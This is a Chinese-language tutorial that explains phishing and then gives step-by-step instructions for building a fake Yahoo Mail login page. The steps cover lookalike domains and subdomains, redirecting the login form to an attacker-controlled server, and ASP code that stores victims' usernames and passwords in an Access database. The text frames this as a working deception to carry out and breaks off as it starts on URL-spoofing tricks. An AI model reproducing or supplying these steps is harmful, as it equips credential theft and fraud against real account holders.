網(wǎng)絡(luò)釣魚因其嚴(yán)重危害網(wǎng)民利益和互聯(lián)網(wǎng)信譽(yù)體制，越來越多地受到人們的關(guān)注，國際上已經(jīng)成立反網(wǎng)絡(luò)釣魚工作小組（APWG，Anti-Phishing Working Group），這是一個聯(lián)合機(jī)構(gòu)，擁有大約800名成員，他們來自約490家金融服務(wù)公司、技術(shù)公司、服務(wù)提供商、國家法律執(zhí)行機(jī)構(gòu)和立法機(jī)構(gòu)，這些機(jī)構(gòu)的職責(zé)是向產(chǎn)業(yè)股份持有人提供一個保密論壇以討論網(wǎng)絡(luò)釣魚問題。反網(wǎng)絡(luò)釣魚工作小組通過召開會議以及成員之間的電子形式的討論，努力從硬成本和軟成本兩個方面來定義網(wǎng)絡(luò)釣魚的范圍，分享信息和最佳操作模式以消除存在的問題，希望在不久的將來，徹底消滅網(wǎng)絡(luò)釣魚陷阱，還給大家一個真誠、誠信的互聯(lián)網(wǎng)。

一. 釣魚的原理：

網(wǎng)絡(luò)釣魚(Phishing)一詞，是“Fishing”和“Phone”的綜合體，由于黑客始祖起初是以電話作案，所以用“Ph”來取代“F”，創(chuàng)造了”Phishing”,Phishing 發(fā)音與 Fishing相同。 “網(wǎng)絡(luò)釣魚”就其本身來說，稱不上是一種獨立的攻擊手段，更多的只是詐騙方法，就像現(xiàn)實社會中的一些詐騙一樣。攻擊者利用欺騙性的電子郵件和偽造的Web站點來進(jìn)行詐騙活動，誘騙訪問者提供一些個人信息，如信用卡號、賬戶用和口令、社保編號等內(nèi)容（通常主要是那些和財務(wù)，賬號有關(guān)的信息，以獲取不正當(dāng)利益），受騙者往往會泄露自己的財務(wù)數(shù)據(jù)。

現(xiàn)在網(wǎng)絡(luò)釣魚的技術(shù)手段越來越復(fù)雜，比如隱藏在圖片中的惡意代碼、鍵盤記錄程序，當(dāng)然還有和合法網(wǎng)站外觀完全一樣的虛假網(wǎng)站，這些虛假網(wǎng)站甚至連瀏覽器下方的鎖形安全標(biāo)記都能顯示出來。網(wǎng)絡(luò)釣魚的手段越來越狡猾，這里首先介紹一下網(wǎng)絡(luò)釣魚的工作流程。通常有五個階段：

圖1

1. 釣魚者入侵初級服務(wù)器，竊取用戶的名字和郵件地址

2. 釣魚者發(fā)送有針對性質(zhì)的郵件3. 受害用戶訪問假冒網(wǎng)址

4. 受害用戶提供秘密和用戶信息被釣魚者取得

5. 釣魚者使用受害用戶的身份進(jìn)入其他網(wǎng)絡(luò)服務(wù)器

關(guān)于惡意垃圾郵件，想必大家都很了解了，這里我們要實現(xiàn)和操作的是第三種，偽造目標(biāo)網(wǎng)站，使目標(biāo)用戶訪問假冒網(wǎng)站，從而完成我們的欺騙。

二. 實現(xiàn)方法

下面我們實現(xiàn)一個簡單的網(wǎng)頁釣魚頁面，大家可以根據(jù)自己的需要添加和修改。

1.首先我們申請一個空間，在空間上用來存放我們的網(wǎng)頁

2.我們再申請一個域名，為了達(dá)到欺騙效果，我們可以申請一些名字和我們要欺騙的網(wǎng)站類似的域名:如: www.yahoo.com  我們申請一個 www.yaho.com等

如果不能申請這些頂級域名的話，我們也可以修改我們的二級域名

如：我們自己的域名是tcbmail.com，我們可以添加一個yahoo.tcbmail.com的二級域名，這樣可以增加欺騙的成功率

將我們的空間地址綁定到我們的域名上

3.選取目標(biāo)，修改代碼。

下面我們看一下我們要欺騙的目標(biāo)，這里我們以yahoo為例，其他網(wǎng)站我們也可以采取類似辦法

打開yahoo郵件的主頁：https://login.yahoo.com/config/mail?.intl=us 

圖2

查看其原代碼,我們看到這樣一句話

https://login.yahoo.com/config/login?" autocomplete="off" name="login_form" onsubmit="return 

hash2(this)">

這句話的意思就是將我們輸入的表單項的值提交到后臺的處理網(wǎng)頁https://login.yahoo.com/config/login?呵呵，這里就給我們提供了機(jī)會，我們可以仿造一個yahoo的郵件的主頁，將提交后的頁面換成我們自己的頁面，通過后臺數(shù)據(jù)庫處理，就可以達(dá)到截獲目標(biāo)帳戶密碼的效果。

下面我們就具體操作一下

將yahoo郵件的主頁保存到本地

將

P>https://login.yahoo.com/config/login?" autocomplete="off" name="login_form" onsubmit="return 

hash2(this)">

修改為

 {FORM method="post" action="http://我們自己 域名/test.asp"  target=_self}

保存為mail.html

4.編寫test.asp，使其完成將輸入的值存儲到我們對應(yīng)的數(shù)據(jù)庫中，這里我們可以直接使用access數(shù)據(jù)庫利用以下代碼就可以完成我們的目的

<%
dim db,strcon,qq,pass,rs,strSql
qq=Request("username")
pass=Request("passwd")
strcon="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.mappath("pass.mdb")
Set db=Server.createobject("ADODB.connection")
db.open strcon
strSql="INSERT INTO name(name, pass) VALUES('"& qq &"','"& pass &"')" 
db.Execute(strSql)
%>

5.將編輯好的mail.html、test.asp以及我們編輯好的pass.mdb上傳到空間中

訪問http://我們自己的域名/mail.html

是不是就看到y(tǒng)ahoo的郵箱主頁

當(dāng)你輸入用戶名、密碼的時候，對應(yīng)的輸入已經(jīng)存儲到我們自己的數(shù)據(jù)庫pass.mdb中了，欺騙成功.

圖3

當(dāng)然啦，現(xiàn)在大家的安全意識都比以前強(qiáng)了，如果大家留意我們所發(fā)的鏈接時，有些細(xì)心的朋友還是會注意到網(wǎng)頁和實際的不同

但是如果你的域名欺騙性比較大的話，你的成功性也會比較大

如：http://mail.yaho.com.cn/mail.html看起來是不是很像

或者添加一個二級域名

如：http://yahoo.duay.com/mail.html也可以起到一個不錯的欺騙效果

如果你申請的域名類似于www.tiger.com那我們該如何處理呢？

下面再簡單介紹幾種URL欺騙的方法